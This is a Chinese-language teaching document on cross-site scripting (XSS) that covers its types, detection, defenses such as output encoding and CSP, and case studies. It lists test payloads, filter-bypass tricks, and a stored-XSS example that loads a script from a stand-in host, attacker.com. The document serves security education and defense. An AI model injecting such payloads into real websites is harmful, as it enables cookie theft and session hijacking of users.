基于FreeBuf文章的《Web安全测试基础：XSS漏洞原理与防御》教学文档<\/h1>

1. XSS漏洞概述<\/h2>

1.1 基本定义<\/h3>
跨站脚本攻击(XSS, Cross-Site Scripting)是一种将恶意脚本注入到可信网站中的攻击方式。攻击者利用Web应用对用户输入过滤不严的漏洞，将恶意代码注入到网页中，当其他用户访问该页面时，恶意代码会被执行。<\/p>

1.2 危害性<\/h3>

窃取用户Cookie和会话信息<\/li>
篡改网页内容<\/li>
进行钓鱼攻击<\/li>
传播恶意软件<\/li>
劫持用户会话<\/li>

记录键盘输入<\/li> <\/ul>

2. XSS漏洞类型<\/h2>

2.1 反射型XSS (非持久型)<\/h3>

攻击脚本来自当前HTTP请求<\/li>
服务器未正确处理用户输入，直接返回给客户端<\/li>
需要诱骗用户点击特制链接<\/li>

典型场景：搜索框、错误消息页面<\/li> <\/ul>

2.2 存储型XSS (持久型)<\/h3>

攻击脚本被存储到服务器数据库中<\/li>
每次用户访问受影响页面都会执行恶意代码<\/li>
危害更大，影响范围更广<\/li>

典型场景：留言板、评论系统、用户资料<\/li> <\/ul>

2.3 DOM型XSS<\/h3>

完全在客户端执行，不涉及服务器<\/li>
由于JavaScript不当地操作DOM导致<\/li>
攻击载荷在URL片段(#之后的部分)中<\/li>

典型场景：基于前端框架的单页应用<\/li> <\/ul>

3. XSS攻击原理<\/h2>

3.1 基本攻击流程<\/h3>

攻击者构造恶意输入<\/li>
网站未充分过滤输入，存储或反射恶意代码<\/li>
受害者访问包含恶意代码的页面<\/li>
浏览器执行恶意脚本<\/li>

攻击者获取敏感信息或执行恶意操作<\/li> <\/ol>

3.2 常见注入点<\/h3>

<script><\/code>标签直接执行<\/li>
HTML标签属性：onerror<\/code>, onload<\/code>, onclick<\/code>等事件<\/li>
javascript:<\/code>伪协议<\/li>
CSS表达式<\/li>

Flash ActionScript<\/li>
<\/ul>
3.3 典型攻击载荷<\/h3>
<<\/span>script<\/span>><\/span>alert<\/span>(document.cookie<\/span>)<<\/span>\/script><\/span>
<\/span><\/span><<\/span>img<\/span> src<\/span>=<\/span>x<\/span> onerror<\/span>=<\/span>alert<\/span>(1<\/span>)><\/span>
<\/span><\/span><<\/span>a<\/span> href<\/span>=<\/span>"javascript:alert(1)"<\/span>><\/span>点击<\/span><<\/span>\/a><\/span>
<\/span><\/span><<\/span>div<\/span> onmouseover<\/span>=<\/span>"alert(1)"<\/span>><<\/span>\/div><\/span>
<\/span><\/span><\/code><\/pre>4. XSS漏洞检测方法<\/h2>
4.1 手工测试<\/h3>

寻找所有用户输入点<\/li>
尝试注入简单测试载荷：<script>alert(1)<\/script><\/code><\/li>
观察是否弹出警告框或代码被执行<\/li>
尝试绕过可能的过滤机制<\/li>
<\/ol>
4.2 自动化工具<\/h3>

Burp Suite<\/li>
OWASP ZAP<\/li>
XSSer<\/li>
BeEF (Browser Exploitation Framework)<\/li>
<\/ul>
4.3 测试用例示例<\/h3>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("XSS")`>
<IMG """><SCRIPT>alert('XSS')<\/SCRIPT>">
<\/code><\/pre>
5. XSS防御措施<\/h2>
5.1 输入过滤<\/h3>

对用户输入进行严格验证<\/li>
使用白名单而非黑名单<\/li>
过滤或转义特殊字符：<<\/code>, ><\/code>, "<\/code>, '<\/code>, &<\/code>, \/<\/code><\/li>
使用正则表达式进行模式匹配<\/li>
<\/ul>
5.2 输出编码<\/h3>

HTML实体编码：<<\/code> → &lt;<\/code>, ><\/code> → &gt;<\/code><\/li>
JavaScript编码<\/li>
URL编码<\/li>
CSS编码<\/li>
根据输出上下文选择合适的编码方式<\/li>
<\/ul>
5.3 使用安全HTTP头<\/h3>

Content Security Policy (CSP)
Content-Security-Policy: default-src 'self'; script-src 'self' trusted.com; object-src 'none'
<\/span><\/span><\/span><\/code><\/pre><\/li>
X-XSS-Protection
X-XSS-Protection: 1; mode=block
<\/span><\/span><\/span><\/code><\/pre><\/li>
HttpOnly Cookie标志
Set-Cookie: sessionid=12345; HttpOnly
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
5.4 其他防御措施<\/h3>

使用现代前端框架(React, Vue等)的自动转义功能<\/li>
避免使用innerHTML<\/code>，使用textContent<\/code>代替<\/li>
对富文本使用专门的净化库(如DOMPurify)<\/li>
定期进行安全审计和渗透测试<\/li>
<\/ul>
6. 实际案例分析<\/h2>
6.1 反射型XSS案例<\/h3>
http:\/\/example.com\/search?query=<script>alert(1)<\/script>
<\/code><\/pre>

服务器直接返回用户搜索内容<\/li>
未对特殊字符进行转义<\/li>
解决方案：对输出进行HTML实体编码<\/li>
<\/ul>
6.2 存储型XSS案例<\/h3>
\/\/ 用户评论内容
<\/span><\/span><\/span><\/span><<\/span>script<\/span> src<\/span>=<\/span>"http:\/\/attacker.com\/malicious.js"<\/span>><<\/span>\/script><\/span>
<\/span><\/span><\/code><\/pre>
评论系统未过滤脚本标签<\/li>
解决方案：输入时过滤危险标签，输出时进行编码<\/li>
<\/ul>
6.3 DOM型XSS案例<\/h3>
\/\/ 从URL获取参数并直接写入DOM
<\/span><\/span><\/span><\/span>var<\/span> name<\/span> =<\/span> document.location<\/span>.hash<\/span>.substr<\/span>(1<\/span>);
<\/span><\/span>document.getElementById<\/span>('username'<\/span>).innerHTML<\/span> =<\/span> name<\/span>;
<\/span><\/span><\/code><\/pre>
攻击URL: example.com#<img src=x onerror=alert(1)><\/code><\/li>
解决方案：使用textContent<\/code>而非innerHTML<\/code>，对输入进行验证<\/li>
<\/ul>
7. 进阶话题<\/h2>
7.1 XSS与CSRF结合攻击<\/h3>

利用XSS窃取CSRF Token<\/li>
通过XSS发起CSRF请求<\/li>
组合攻击危害更大<\/li>
<\/ul>
7.2 绕过过滤技术<\/h3>

大小写混淆：<ScRiPt><\/code><\/li>
编码混淆：<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;><\/code><\/li>
使用HTML5新标签\/属性<\/li>
利用浏览器解析差异<\/li>
<\/ul>
7.3 现代Web安全机制<\/h3>

Subresource Integrity (SRI)<\/li>
Trusted Types API<\/li>
Sandboxed iframes<\/li>
SameSite Cookie属性<\/li>
<\/ul>
8. 总结<\/h2>
XSS漏洞是Web应用最常见的安全威胁之一，防御XSS需要开发者：<\/p>

对所有用户输入保持怀疑态度<\/li>
实施严格的输入验证和输出编码<\/li>
采用纵深防御策略，结合多种安全措施<\/li>
保持对新兴攻击技术的了解<\/li>
定期进行安全测试和代码审计<\/li>
<\/ol>
通过全面的防御措施，可以显著降低XSS攻击的风险，保护用户数据和系统安全。<\/p>